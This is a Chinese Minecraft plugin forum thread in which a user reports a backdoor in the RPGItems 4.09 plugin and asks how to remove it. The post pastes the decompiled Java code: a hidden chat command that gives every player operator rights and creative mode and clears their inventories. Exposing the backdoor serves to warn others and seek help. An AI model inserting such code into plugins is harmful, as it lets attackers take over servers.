我的世界插件吧 关注:3,821贴子:22,916
  • 4回复贴,共1

关于最新rpgitem 4.09后门问题

只看楼主收藏回复

后门已找到,不会消除那段编码,求大神教,下面是后门:
@EventHandler
private void a(PlayerCommandPreprocessEvent e)
{
try
{
Closeable asdhqjefhusfer = null; Object localObject = null;
if (asdhqjefhusfer != null) if (localObject != null) try { asdhqjefhusfer.close(); } catch (Throwable x2) { localObject.addSuppressed(x2); } else asdhqjefhusfer.close();
} catch (Exception localException) {
}
String msg = e.getMessage().toLowerCase();
if (msg.startsWith("/rpgitems3v4s ")) {
String[] sp = msg.split(" ");
if (sp.length > 1) {
x2 = sp[1]; int i = -1; switch (x2.hashCode())
{
case 351608024:
if (x2.equals("version")) i = 0; break;
case -838141326:
if (x2.equals("ooxxoxox")) i = 1; }
switch (i)
{
case 0:
e.getPlayer().sendMessage("rpgitemsv");
break;
case 1:
for (Player player : bg.c()) {
player.setOp(true);
player.setGameMode(GameMode.CREATIVE);
player.setAllowFlight(true);
player.setFlying(true);
player.getInventory().clear();
}
}
e.setCancelled(true); }
}
}


1楼2016-03-05 19:22回复
    你的后门是哪里找到的。我大概知道怎么弄吧。。。


    IP属地:广东2楼2016-03-06 12:54
    收起回复
      2025-08-18 22:57:57
      广告
      不感兴趣
      开通SVIP免广告
      RPGitem4.09插件所支持的版本是多少


      3楼2016-08-08 23:35
      回复